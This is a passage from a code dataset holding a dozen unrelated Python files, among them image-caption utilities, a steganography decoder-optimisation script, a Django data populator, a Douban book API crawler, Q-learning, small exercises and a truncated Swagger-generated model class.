'\r\n\r\ndef readDoc(filename):\r\n\t\r\n\tfile = open(filename, 'r')\t\r\n\tdoc = file.read()\t\r\n\tfile.close()\r\n\treturn doc\r\n \r\n\r\ndef loadDataset(filename):\r\n doc = readDoc(filename)\r\n dataset = list()\r\n \r\n for l in doc.split('\\n'): \t\r\n if len(l) < 1: #skip empty\r\n continue\r\n \t\t\r\n text=l\r\n dataset.append(text)\r\n return set(dataset)\r\n \r\n\r\ndef getDescriptions_dataset(filename, dataset):\r\n\r\n\tdocument = readDoc(filename)\r\n\tdescriptions_all = dict()\r\n\tfor line in document.split('\\n'):\t\r\n\t\twords = line.split()\t\t\r\n\t\timgId, img_desc = words[0], words[1:]\t\r\n\t\tif imgId in dataset:\r\n\t\t\r\n\t\t\tif imgId not in descriptions_all:\r\n\t\t\t\tdescriptions_all[imgId] = list()\r\n\t\t\r\n\t\t\tdesc = START+ ' '.join(img_desc) +END\r\n\t\t\r\n\t\t\tdescriptions_all[imgId].append(desc)\r\n\treturn descriptions_all\r\n \r\n\r\n\r\n###get all photo features for a dataset\r\ndef getFeatures_dataset(file, dataset):\t\r\n\tfeature_all = load(open(file, 'rb'))\t\r\n\tfeature = {f: feature_all[f] for f in dataset}\r\n\treturn feature\r\n \r\n####list of descriptions\r\ndef desc_list(descriptions):\r\n\tdescList = list()\r\n\tfor k in descriptions.keys():\r\n\t\t[descList.append(d) for d in descriptions[k]]\r\n\treturn descList\r\n \r\n\r\ndef fit_tokenizer(descriptions):\r\n\tdesc = desc_list(descriptions)\r\n ##User keras Tokenizer\r\n\ttokenizer = Tokenizer()\r\n\ttokenizer.fit_on_texts(desc)\r\n\treturn tokenizer\r\n \r\n####get max lenght of caption\r\ndef max_length(descriptions):\r\n\tcaptions = desc_list(descriptions) \r\n\treturn max(len(c.split()) for c in captions)\r\n \r\n\r\n\r\n# map an integer to a word\r\ndef word_for_id(integer, tokenizer):\r\n\tfor word, index in tokenizer.word_index.items():\r\n\t\tif index == integer:\r\n\t\t\treturn word\r\n\treturn None\r\n","sub_path":"Task-2/Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"85290894","text":"\n\nclass Solution:\n # @param n, an integer\n # @return an integer\n def climbStairs(self, n):\n i = 0\n j = 1\n for x in range(n):\n i, j = j, i + j\n return j\n\n\n def climbStairs2(self, n):\n res = 0\n k = 0\n while 2 * k < n + 1:\n h = n - 2 * k\n res += combination(h + k, k)\n k += 1\n return res\n\n\ndef combination(n, k):\n if n == k or k == 0:\n return 1\n res = 1\n for i in range(1, k + 1):\n res *= n - i + 1\n res /= i\n return res\n","sub_path":"Python/Climbing Stairs.py","file_name":"Climbing Stairs.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"15323424","text":"import os\nos.environ.setdefault('DJANGO_SETTINGS_MODULE','NewProject.settings')\n\nimport django\ndjango.setup()\n\nfrom faker import Faker\nfakegen = Faker()\n\nfrom random import randint\n\nfrom NewApp.models import User, Exam\n\ndef populate(N=10):\n for entry in range(N):\n \n fake_username = fakegen.user_name()\n fake_email = fakegen.email()\n user, created = User.objects.get_or_create(username = fake_username, email = fake_email)\n\n random_score = randint(0,100)\n exam, created = Exam.objects.get_or_create(user = user, exam_score = random_score)\n\n\nif __name__ == '__main__': \n number = input(\"What number of user do you want? \")\n print('start populate {} user ..'.format(number))\n number = int(number)\n populate(number)\n print('population complete !')","sub_path":"Django Web-App/NewProject/populate_user.py","file_name":"populate_user.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"511268856","text":"import math\n\nn=int(input(\"Enter the lower bound : \"))\nm=int(input(\"Enter the upper bound : \"))\n\nnum_list=[]\n\nfor num in range(n,m+1):\n count=flag=0\n num=str(num)\n for i in num:\n \n count=count+1\n if int(i)%2!=0 :\n flag=1\n \n if count==4 and int(num)== (math.isqrt(int(num))**2) and flag==0:\n num_list.append(int(num))\n\nif len(num_list)==0:\n print(\"List is Empty!\")\nelse:\n print(\"Resultant list is :\",num_list)\n","sub_path":"LabCycle_2.1_4.py","file_name":"LabCycle_2.1_4.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"552676200","text":"import numpy as np \nimport torch\nimport matplotlib.pyplot as plt\nfrom imageio import imread, imwrite\nfrom torch import nn\nimport random\nimport sys\nimport argparse\nfrom PIL import Image\nfrom utils import calc_psnr, calc_ssim\nimport os\nimport time\n\nimport torch\nfrom torch.optim import LBFGS\nimport torch.nn.functional as F\n\nimport sys\nsys.path.append(\"..\")\n# from steganogan.decoders import DenseDecoderNLayers\nfrom steganogan.decoders import BasicDecoder, DenseDecoder\nfrom steganogan import SteganoGAN\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--name', type=str,\n help='file name')\nparser.add_argument('--dataset_path', type=str,\n help='path to dataset')\nparser.add_argument('--num_bits', type=int,\n help='number of bits to hide')\nparser.add_argument('--output_image_path', type=str,\n help='output image path')\nparser.add_argument('--pretrained', action=\"store_true\")\nparser.add_argument('--psnr_weight', type=float, default=0.5)\n\n\nargs = parser.parse_args()\nprint(args.name)\nexpname = \"main100_1\"\n\n\ndef flatten(image, dim=3):\n img = torch.cat(torch.split(image, 1, dim=1), dim=dim)\n return img\n\n\ndef shuffle_params(m):\n if type(m)==nn.Conv2d or type(m)==nn.BatchNorm2d:\n param = m.weight\n m.weight.data = nn.Parameter(torch.tensor(np.random.normal(0, 1, param.shape)).float())\n \n param = m.bias\n m.bias.data = nn.Parameter(torch.zeros(len(param.view(-1))).float().reshape(param.shape))\n\n\nclass normLayer(nn.Module):\n def __init__(self):\n super(normLayer, self).__init__()\n \n def forward(self, x):\n b,c,h,w = x.shape\n assert b == 1\n mean = x.view(c, -1).mean(-1)\n std = x.view(c, -1).std(-1)\n x = x - mean.reshape([1, c, 1, 1])\n x = x / (std + 1e-7).reshape([1,c,1,1])\n return x\n\n\nclass BasicDecoder(nn.Module):\n \"\"\"\n The BasicDecoder module takes an steganographic image and attempts to decode\n the embedded data tensor.\n\n Input: (N, 3, H, W)\n Output: (N, D, H, W)\n \"\"\"\n\n def _conv2d(self, in_channels, out_channels):\n return nn.Conv2d(\n in_channels=in_channels,\n out_channels=out_channels,\n kernel_size=3,\n padding=1\n )\n\n def _build_models(self):\n self.layers = nn.Sequential(\n self._conv2d(self.divstack * self.divstack * (1 if flatten_image else 3), self.hidden_size),\n nn.LeakyReLU(inplace=True),\n normLayer(),\n\n self._conv2d(self.hidden_size, self.hidden_size),\n nn.LeakyReLU(inplace=True),\n normLayer(),\n\n self._conv2d(self.hidden_size, self.hidden_size),\n nn.LeakyReLU(inplace=True),\n normLayer(),\n\n self._conv2d(self.hidden_size, self.data_depth * self.divstack * self.divstack // 3 if flatten_image else self.data_depth * self.divstack * self.divstack)\n )\n\n return [self.layers]\n\n def __init__(self, data_depth, hidden_size):\n super(BasicDecoder, self).__init__()\n self.data_depth = data_depth\n self.hidden_size = hidden_size\n self.divstack = 1\n\n self._models = self._build_models()\n\n def forward(self, x):\n x = self._models[0](x)\n\n if len(self._models) > 1:\n x_list = [x]\n for layer in self._models[1:]:\n x = layer(torch.cat(x_list, dim=1))\n x_list.append(x)\n\n return x\n\n\nhidden_size = 128\ncriterion = torch.nn.BCEWithLogitsLoss(reduction='sum')\n\n# models\npretrained = args.pretrained\nflatten_image = False\nsteps = 2000\nmax_iter = 20\nalpha = 0.1\neps = 0.105\npsnr_weight = args.psnr_weight\n\n\ndef psnr_loss(img1, img2):\n weight = torch.tensor([65.738, 129.057, 25.064]).view(1, 3, 1, 1) / 256.0\n diff = torch.sum((img1 - img2) * weight.to(img1.device), dim=1)\n return 10 * torch.log10(torch.norm(diff))\n\n\nfor seed in [11111,22222,33333,44444,55555,66666,777777,88888,99999,0]:\n if pretrained:\n steganogan = SteganoGAN.load(path=f\"demo_{args.num_bits}.1.steg\", cuda=True, verbose=True)\n model = steganogan.decoder\n else:\n print(\"Using basic decoder\")\n np.random.seed(seed)\n model = BasicDecoder(args.num_bits, hidden_size=hidden_size)\n model.apply(shuffle_params)\n model.to('cuda')\n # print(model)\n\n image = args.dataset_path + args.name\n image = imread(image, pilmode='RGB') / 255.0\n image = torch.FloatTensor(image).permute(2, 1, 0).unsqueeze(0)\n print(image.shape)\n image = image[:, :, :, :]\n image = image.to('cuda')\n if flatten_image:\n image = flatten(image, 3)\n num_pixels = image.shape[2] * image.shape[3]\n out = model(image)\n\n torch.manual_seed(int(args.name[:-4]))\n target = torch.bernoulli(torch.empty(out.shape).uniform_(0, 1)).to(out.device)\n print(target.shape)\n eps = eps - 0.0005\n print(\"eps:\", eps)\n adv_image = image.clone().detach()\n \n start = time.time()\n\n for i in range(steps // max_iter):\n adv_image.requires_grad = True\n optimizer = LBFGS([adv_image], lr=alpha, max_iter=max_iter)\n\n def closure():\n outputs = model(adv_image)\n loss = criterion(outputs, target)\n if psnr_weight > 0:\n pl = psnr_loss(adv_image, image) * num_pixels * psnr_weight\n # print(loss, pl)\n loss += pl\n\n optimizer.zero_grad()\n loss.backward()\n return loss\n\n optimizer.step(closure)\n delta = torch.clamp(adv_image - image, min=-eps, max=eps)\n adv_image = torch.clamp(image + delta, min=0, max=1).detach()\n\n acc = len(torch.nonzero((model(adv_image)>0).float().view(-1) != target.view(-1))) / target.numel()\n# print(i, acc)\n if acc == 0:\n break\n end = time.time()\n\n print(f\"used {end-start:0.3f} seconds.\")\n print(seed)\n psnr = calc_psnr((image.squeeze().permute(2,1,0)*255).detach().cpu().numpy(), (adv_image.squeeze().permute(2,1,0)*255).detach().cpu().numpy())\n print(\"psnr:\", psnr)\n print(\"ssim:\", calc_ssim((image.squeeze().permute(2,1,0)*255).detach().cpu().numpy(), (adv_image.squeeze().permute(2,1,0)*255).detach().cpu().numpy()))\n print(\"error:\", acc)\n lbfgsimg = (adv_image.cpu().squeeze().permute(2,1,0).numpy()*255).astype(np.uint8)\n if psnr > 20:\n break\n\nos.makedirs(args.output_image_path, exist_ok = True)\nimname = args.output_image_path+f'{args.num_bits}_{expname}_{args.name[:-4]}.png'\nImage.fromarray(lbfgsimg).save(imname)\n\nimage_read = imread(imname, pilmode='RGB') / 255.0\nimage_read = torch.FloatTensor(image_read).permute(2, 1, 0).unsqueeze(0).to('cuda')\nacc = len(torch.nonzero((model(image_read)>0).float().view(-1) != target.view(-1))) / target.numel()\nprint(\"read:\", acc)\npsnr = calc_psnr((image.squeeze().permute(2,1,0)*255).detach().cpu().numpy(), (image_read.squeeze().permute(2,1,0)*255).detach().cpu().numpy())\nssim = calc_ssim((image.squeeze().permute(2,1,0)*255).detach().cpu().numpy(), (image_read.squeeze().permute(2,1,0)*255).detach().cpu().numpy())\nprint(\"psnr\", psnr)\nprint(\"ssim\", ssim)\n\nwith open('final_exps_r.csv', mode='a') as file:\n file.write(f'{args.num_bits}, {expname}, {args.name}, {eps}, {seed}, {end - start}, {psnr}, {ssim}, {acc} \\n') \n\n\n\n\n\n","sub_path":"submission_code/scripts/rnns_results_xiangyu.py","file_name":"rnns_results_xiangyu.py","file_ext":"py","file_size_in_byte":7379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"345418274","text":"import firebase_admin\nfrom firebase_admin import db\nfrom time import time\nimport random\nimport lorem\n\ncreds = firebase_admin.credentials.Certificate('./dev/admin-cert.json')\nkwargs = {'databaseURL': 'https://skinder-1.firebaseio.com'}\napp = firebase_admin.initialize_app(creds, kwargs)\n\nusers0 = db.reference('users').get()\nusers = {\n k: v for k, v in users0.items()\n if 'keep' in v and v['keep'] and 'pics' in v\n}\nusers = dict(list(users.items())[-10:])\nusers['0'] = users0['0']\n\ngetTime = lambda i, j: round(1000*(time()+i-3600*(j+1)))\n\nchats = {\n userID: {\n 'thumb': user['pics'][0]['link'],\n 'messages': [\n {\n 'txt': lorem.sentence(),\n 'fromUser': random.choice([True, False]),\n 'created': getTime(i, list(users).index(userID)),\n }\n for i in range(random.randint(3, 20))\n ]\n }\n for userID, user in users.items()\n}\n\ndb.reference('chats').set(chats)\n","sub_path":"dev/simulate_messages.py","file_name":"simulate_messages.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"25782023","text":"# -*- coding: utf-8 -*-\n\nimport logging\nimport time\nimport requests\nimport string\nfrom drawing.util.log import setup_logger\nfrom drawing.models.tables.drawing import DrawingTable\nfrom drawing.models.model import DataBaseModel\nfrom sqlalchemy.orm import sessionmaker\n\nlogger = setup_logger(loggername=__name__, console=logging.DEBUG)\n\nDATABASE_MODEL = DataBaseModel()\nDATABASE_ENGINE = DATABASE_MODEL.db_connect()\n\n\nclass CrawlListGenerator(object):\n def _valid_isbn(self, isbn):\n return len(isbn) == 13 or len(isbn) == 10\n\n def _book_to_crawl(self, row):\n return self._valid_isbn(row.isbn) and (not row.tried_in_douban) and row.single_book\n\n def generate(self):\n db_session = sessionmaker(bind=DATABASE_ENGINE)\n return [row.isbn for row\n in db_session().query(DrawingTable.isbn, DrawingTable.tried_in_douban, DrawingTable.single_book).all()\n if self._book_to_crawl(row)]\n\n\nclass DrawingUpdater(object):\n def __init__(self, isbn, url, response):\n self._status_code = response.status_code\n self._content = response.json()\n self._page_url = url\n self._isbn = isbn\n\n def _handle_drawings(self, callback):\n session = sessionmaker(bind=DATABASE_ENGINE)()\n drawings = session.query(DrawingTable).filter(DrawingTable.isbn == self._isbn)\n for drawing in drawings:\n callback(drawing)\n if drawings.count() == 0:\n logger.warn('ISBN %s is not found in DB' % (self._isbn))\n session.commit()\n session.close()\n\n def _decode_response_content(self, drawing):\n self._mark_tried_in_douban(drawing)\n self._decode_basic_infor(drawing)\n self._decode_isbn(drawing)\n self._decode_rate(drawing)\n\n def _decode_basic_infor(self, drawing):\n if self._content.has_key('id'):\n drawing.douban_id = self._content['id']\n if self._content.has_key('title'):\n drawing.douban_title = self._content['title']\n if self._content.has_key('author_intro') and not drawing.author_intro:\n drawing.author_intro = self._content['author_intro']\n if self._content.has_key('summary') and not drawing.content_intro:\n drawing.content_intro = self._content['summary']\n\n def _decode_rate(self, drawing):\n if self._content.has_key(\"rating\"):\n rating = self._content['rating']\n if rating.has_key(\"numRaters\"):\n drawing.douban_raters = rating['numRaters']\n if rating.has_key(\"average\"):\n drawing.douban_rating_average = string.atof(rating['average']) * 10 # x/100\n\n def _decode_isbn(self, drawing):\n if self._content.has_key('isbn13'):\n drawing.isbn = self._content['isbn13']\n if self._content.has_key('isbn10'):\n drawing.isbn10 = self._content['isbn10']\n\n def _mark_tried_in_douban(self, drawing):\n drawing.tried_in_douban = True\n\n def _handle_success(self):\n self._handle_drawings(callback=self._decode_response_content)\n\n def _handle_404(self):\n logger.info('request to [%s] 404' % (self._page_url))\n self._handle_drawings(callback=self._mark_tried_in_douban)\n\n def _handle_failure(self):\n logger.info('request to [%s], status code is %d' % (self._page_url, self._status_code))\n\n def update(self):\n if self._status_code == requests.codes.ok:\n self._handle_success()\n elif self._status_code == 404:\n self._handle_404()\n else:\n self._handle_failure()\n\n\nclass SingleDrawingCrawler():\n def __init__(self, isbn):\n self._isbn = isbn\n self._page_url = r\"http://api.douban.com/v2/book/isbn/\" + isbn\n self._proxy = r\"10.144.1.10:8080\"\n\n def crawl(self):\n logger.info('crawling %s' % (self._page_url))\n if self._proxy:\n r = requests.get(self._page_url, proxies={'http': self._proxy})\n else:\n r = requests.get(self._page_url)\n DrawingUpdater(self._isbn, self._page_url, r).update()\n\n\ndef crawl_douban_api():\n for isbn in ['9787539174457', '7550243158']: # CrawlListGenerator().generate():\n SingleDrawingCrawler(isbn).crawl()\n time.sleep(10)\n\n\nif __name__ == '__main__':\n crawl_douban_api()\n","sub_path":"crawl_douban_api.py","file_name":"crawl_douban_api.py","file_ext":"py","file_size_in_byte":4308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"504711383","text":"#求解方程和方程组\nfrom sympy import *\n\n# 求解 x*2 - 4 = 0 \n# solve:第一个参数为要解的方程,要求右端等于0,第二个参数为要解的未知数\nx = Symbol('x')\nprint(solve(x*2 -4,x))\n\n\n'''\n求解\n 2 * x - y = 3\n 3 * x + y = 7\n'''\n\nx,y = symbols('x y')\nresult = solve([2*x-y-3,3*x+y-7],[x,y])\nprint(result)\n\n","sub_path":"solve_function/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"444431648","text":"import itertools\nimport numpy as np\nimport windy_gridworld\nimport plotting\nfrom collections import defaultdict\n\nenv=windy_gridworld.WindyGridworldEnv()\ndef make_episilon_greedy_policy(Q,episilon,nA):\n def policy_fn(s):\n A=np.ones(nA,dtype=float)*episilon/nA\n best_action=np.argmax(Q[s])\n A[best_action]+=(1.0-episilon)\n return A\n return policy_fn\n\ndef Q_learning(env,num_episodes,discount_factor=1.0,alpha=0.5,epsilon=0.1):\n Q=defaultdict(lambda:np.zeros(env.action_space.n))\n \n stats=plotting.EpisodeStats(episode_lengths=np.zeros(num_episodes),\n episode_rewards=np.zeros(num_episodes))\n policy=make_episilon_greedy_policy(Q,epsilon,env.action_space.n)\n for i_episode in range(num_episodes):\n state=env.reset()\n \n for t in itertools.count():\n action_probs=policy(state)\n action = np.random.choice(np.arange(len(action_probs)), p=action_probs)\n next_state, reward, done, _ = env.step(action)\n stats.episode_rewards[i_episode] += reward\n stats.episode_lengths[i_episode] = t\n best_next_action=np.argmax(Q[next_state])\n td_target=reward+discount_factor*Q[next_state][best_next_action]\n td_delta=td_target-Q[state][action]\n Q[state][action]+=alpha*td_delta \n \n if done:\n break\n state=next_state\n return Q,stats\n \nQ, stats = Q_learning(env, 500) \nplotting.plot_episode_stats(stats) \n","sub_path":"script/Reinforcement/TD/SARSA.py","file_name":"SARSA.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"27416866","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nMain menu\ncalling external class and menu function\n\"\"\"\n\nfrom class_menu import Menu\n\nMENU = Menu()\nCHOICE = \"\"\n\n\ndef loadall():\n \"\"\" load all tables in local DB \"\"\"\n MENU.clearscreen()\n MENU.load_all(CHOICE)\n\n\ndef selection():\n \"\"\" select foods for substitution \"\"\"\n MENU.clearscreen()\n MENU.selection(CHOICE)\n\n\ndef loadcategories():\n \"\"\" load categories in local DB \"\"\"\n MENU.clearscreen()\n MENU.load_categories(CHOICE)\n\n\ndef loadcities():\n \"\"\" load cities in local DB \"\"\"\n MENU.clearscreen()\n MENU.load_cities(CHOICE)\n\n\ndef loadbrands():\n \"\"\" load brands in local DB \"\"\"\n MENU.clearscreen()\n MENU.load_brands(CHOICE)\n\n\ndef loadfoods():\n \"\"\" load all tables in local DB \"\"\"\n MENU.clearscreen()\n MENU.load_foods(CHOICE)\n\n\ndef substitutemanage():\n \"\"\" item manage food substitute table \"\"\"\n MENU.clearscreen()\n MENU.substitute_manage(CHOICE)\n\n\ndef quit_programm():\n \"\"\" quit menu and program \"\"\"\n MENU.quit()\n\n\n# Main MENU\nwhile CHOICE != \"0\":\n MENU.clearscreen()\n MENU.main_menu()\n CHOICE = input(\"Make your choice : \")\n if CHOICE == \"q\":\n CHOICE = \"0\"\n MENU_VALUE = {0: quit_programm,\n 1: loadall,\n 2: loadcategories,\n 3: loadcities,\n 4: loadbrands,\n 5: loadfoods,\n 6: selection,\n 7: substitutemanage}\n if CHOICE is \"\":\n print('Bad choice')\n else:\n if CHOICE in \"01234567\":\n MENU_VALUE[int(CHOICE)]()\n else:\n print(\"Value must be between 0 et 7 or q, retry\")\n input(\"Press Enter to continue\")\n continue\n MENU.clearscreen()\n","sub_path":"openfoodfacts_menu.py","file_name":"openfoodfacts_menu.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"217091935","text":"from model.contact import Contact\nfrom model.group import Group\nimport random\n\n\ndef test_add_contact_to_group(app, orm):\n if len(orm.get_contact_list()) == 0:\n app.contact.create(Contact(firstname=\"fsff\", middlename=\"fsf\", lastname=\"fsdf\", nickname=\"sdff\", title=\"dsfdsf\",\n company=\"fsfdfdf\",\n address=\"4242\", home=\"3424\", mobile=\"2344\", work=\"4234\",\n fax=\"43244\", email=\"434234\", email2=\"3424\", email3=\"4234\", homepage=\"423424\",\n byear=\"1199\",\n ayear=\"2423\", address2=\"324eeee\", phone2=\"324rew\",\n notes=\"324erwsd\"))\n if len(orm.get_group_list()) == 0:\n app.group.create(Group(name=\"new_name\", header=\"new_header\", footer=\"new_footer\"))\n old_contacts = orm.get_contact_list()\n groups = orm.get_group_list()\n contact = random.choice(old_contacts)\n group = random.choice(groups)\n if contact in orm.get_contacts_in_group(group):\n app.contact.delete_contact_from_group(contact.id, group.id)\n app.contact.add_contact_to_group(contact.id, group.id)\n assert contact in orm.get_contacts_in_group(group)\n assert contact not in orm.get_contacts_not_in_group(group)\n","sub_path":"test/test_add_contact_to_group.py","file_name":"test_add_contact_to_group.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"399960126","text":"import math\nS, P = [int(x) for x in input().split()]\nedges = []\ntree = []\ninfo = []\nvertices = [[i] for i in range(P)]\nfor i in range(P):\n info.append([int(x) for x in input().split()])\nfor i in range(P):\n for j in range(P):\n if i == j:\n continue\n x1, y1 = info[i]\n x2, y2 = info[j]\n edges.append([math.sqrt((x1-x2)**2 + (y1-y2)**2), i, j])\nedges.sort()\nfor i in range(P-1):\n while True:\n edge = edges[0]\n start = edge[1]\n end = edge[2]\n m, n = [0, 0]\n for part in vertices:\n if start in part:\n m = part\n if end in part:\n n = part\n if m == n:\n edges.pop(0)\n continue\n tree.append(edge[0])\n ind1 = vertices.index(m)\n ind2 = vertices.index(n)\n vertices[ind1].extend(vertices[ind2])\n vertices.pop(ind2)\n edges.pop(0)\n break\nfor i in range(S-1):\n max_path = max(tree)\n tree.remove(max_path)\nres = max(tree)\nif res == int(res):\n print(str(int(res))+\".00\", end='')\nelse:\n print(round(res, 2), end='')","sub_path":"Code/CodeRecords/2431/61041/306272.py","file_name":"306272.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"269625796","text":"# coding: utf-8\n\n\"\"\"\n StarRez API\n\n This is a way to connect with the StarRez API. We are not the developers of the StarRez API, we are just an organization that uses it and wanted a better way to connect to it. # noqa: E501\n\n OpenAPI spec version: 1.0.0\n Contact: resdev@calpoly.edu\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\n\nclass VMGroupMessageItem(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'vm_group_message_id': 'int',\n 'vm_group_id': 'int',\n 'vm_group_message_date': 'str',\n 'duration': 'int',\n 'filename': 'str',\n 'subject': 'str',\n 'sender_number': 'str',\n 'sender': 'str',\n 'priority': 'str',\n 'status': 'str',\n 'date_modified': 'str'\n }\n\n attribute_map = {\n 'vm_group_message_id': 'VMGroupMessageID',\n 'vm_group_id': 'VMGroupID',\n 'vm_group_message_date': 'VMGroupMessageDate',\n 'duration': 'Duration',\n 'filename': 'Filename',\n 'subject': 'Subject',\n 'sender_number': 'SenderNumber',\n 'sender': 'Sender',\n 'priority': 'Priority',\n 'status': 'Status',\n 'date_modified': 'DateModified'\n }\n\n def __init__(self, vm_group_message_id=None, vm_group_id=None, vm_group_message_date=None, duration=None, filename=None, subject=None, sender_number=None, sender=None, priority=None, status=None, date_modified=None): # noqa: E501\n \"\"\"VMGroupMessageItem - a model defined in Swagger\"\"\" # noqa: E501\n\n self._vm_group_message_id = None\n self._vm_group_id = None\n self._vm_group_message_date = None\n self._duration = None\n self._filename = None\n self._subject = None\n self._sender_number = None\n self._sender = None\n self._priority = None\n self._status = None\n self._date_modified = None\n self.discriminator = None\n\n if vm_group_message_id is not None:\n self.vm_group_message_id = vm_group_message_id\n if vm_group_id is not None:\n self.vm_group_id = vm_group_id\n if vm_group_message_date is not None:\n self.vm_group_message_date = vm_group_message_date\n if duration is not None:\n self.duration = duration\n if filename is not None:\n self.filename = filename\n if subject is not None:\n self.subject = subject\n if sender_number is not None:\n self.sender_number = sender_number\n if sender is not None:\n self.sender = sender\n if priority is not None:\n self.priority = priority\n if status is not None:\n self.status = status\n if date_modified is not None:\n self.date_modified = date_modified\n\n @property\n def vm_group_message_id(self):\n \"\"\"Gets the vm_group_message_id of this VMGroupMessageItem. # noqa: E501\n\n VM Group Message # noqa: E501\n\n :return: The vm_group_message_id of this VMGroupMessageItem. # noqa: E501\n :rtype: int\n \"\"\"\n return self._vm_group_message_id\n\n @vm_group_message_id.setter\n def vm_group_message_id(self, vm_group_message_id):\n \"\"\"Sets the vm_group_message_id of this VMGroupMessageItem.\n\n VM Group Message # noqa: E501\n\n :param vm_group_message_id: The vm_group_message_id of this VMGroupMessageItem. # noqa: E501\n :type: int\n \"\"\"\n\n self._vm_group_message_id = vm_group_message_id\n\n @property\n def vm_group_id(self):\n \"\"\"Gets the vm_group_id of this VMGroupMessageItem. # noqa: E501\n\n VM Group # noqa: E501\n\n :return: The vm_group_id of this VMGroupMessageItem. # noqa: E501\n :rtype: int\n \"\"\"\n return self._vm_group_id\n\n @vm_group_id.setter\n def vm_group_id(self, vm_group_id):\n \"\"\"Sets the vm_group_id of this VMGroupMessageItem.\n\n VM Group # noqa: E501\n\n :param vm_group_id: The vm_group_id of this VMGroupMessageItem. # noqa: E501\n :type: int\n \"\"\"\n\n self._vm_group_id = vm_group_id\n\n @property\n def vm_group_message_date(self):\n \"\"\"Gets the vm_group_message_date of this VMGroupMessageItem. # noqa: E501\n\n VM Group Message Date # noqa: E501\n\n :return: The vm_group_message_date of this VMGroupMessageItem. # noqa: E501\n :rtype: str\n \"\"\"\n return self._vm_group_message_date\n\n @vm_group_message_date.setter\n def vm_group_message_date(self, vm_group_message_date):\n \"\"\"Sets the vm_group_message_date of this VMGroupMessageItem.\n\n VM Group Message Date # noqa: E501\n\n :param vm_group_message_date: The vm_group_message_date of this VMGroupMessageItem. # noqa: E501\n :type: str\n \"\"\"\n\n self._vm_group_message_date = vm_group_message_date\n\n @property\n def duration(self):\n \"\"\"Gets the duration of this VMGroupMessageItem. # noqa: E501\n\n Duration # noqa: E501\n\n :return: The duration of this VMGroupMessageItem. # noqa: E501\n :rtype: int\n \"\"\"\n return self._duration\n\n @duration.setter\n def duration(self, duration):\n \"\"\"Sets the duration of this VMGroupMessageItem.\n\n Duration # noqa: E501\n\n :param duration: The duration of this VMGroupMessageItem. # noqa: E501\n :type: int\n \"\"\"\n\n self._duration = duration\n\n @property\n def filename(self):\n \"\"\"Gets the filename of this VMGroupMessageItem. # noqa: E501\n\n Filename # noqa: E501\n\n :return: The filename of this VMGroupMessageItem. # noqa: E501\n :rtype: str\n \"\"\"\n return self._filename\n\n @filename.setter\n def filename(self, filename):\n \"\"\"Sets the filename of this VMGroupMessageItem.\n\n Filename # noqa: E501\n\n :param filename: The filename of this VMGroupMessageItem. # noqa: E501\n :type: str\n \"\"\"\n if filename is not None and len(filename) > 500:\n raise ValueError(\"Invalid value for `filename`, length must be less than or equal to `500`\") # noqa: E501\n\n self._filename = filename\n\n @property\n def subject(self):\n \"\"\"Gets the subject of this VMGroupMessageItem. # noqa: E501\n\n Subject # noqa: E501\n\n :return: The subject of this VMGroupMessageItem. # noqa: E501\n :rtype: str\n \"\"\"\n return self._subject\n\n @subject.setter\n def subject(self, subject):\n \"\"\"Sets the subject of this VMGroupMessageItem.\n\n Subject # noqa: E501\n\n :param subject: The subject of this VMGroupMessageItem. # noqa: E501\n :type: str\n \"\"\"\n if subject is not None and len(subject) > 30:\n raise ValueError(\"Invalid value for `subject`, length must be less than or equal to `30`\") # noqa: E501\n\n self._subject = subject\n\n @property\n def sender_number(self):\n \"\"\"Gets the sender_number of this VMGroupMessageItem. # noqa: E501\n\n Sender Number # noqa: E501\n\n :return: The sender_number of this VMGroupMessageItem. # noqa: E501\n :rtype: str\n \"\"\"\n return self._sender_number\n\n @sender_number.setter\n def sender_number(self, sender_number):\n \"\"\"Sets the sender_number of this VMGroupMessageItem.\n\n Sender Number # noqa: E501\n\n :param sender_number: The sender_number of this VMGroupMessageItem. # noqa: E501\n :type: str\n \"\"\"\n if sender_number is not None and len(sender_number) > 30:\n raise ValueError(\"Invalid value for `sender_number`, length must be less than or equal to `30`\") # noqa: E501\n\n self._sender_number = sender_number\n\n @property\n def sender(self):\n \"\"\"Gets the sender of this VMGroupMessageItem. # noqa: E501\n\n Sender # noqa: E501\n\n :return: The sender of this VMGroupMessageItem. # noqa: E501\n :rtype: str\n \"\"\"\n return self._sender\n\n @sender.setter\n def sender(self, sender):\n \"\"\"Sets the sender of this VMGroupMessageItem.\n\n Sender # noqa: E501\n\n 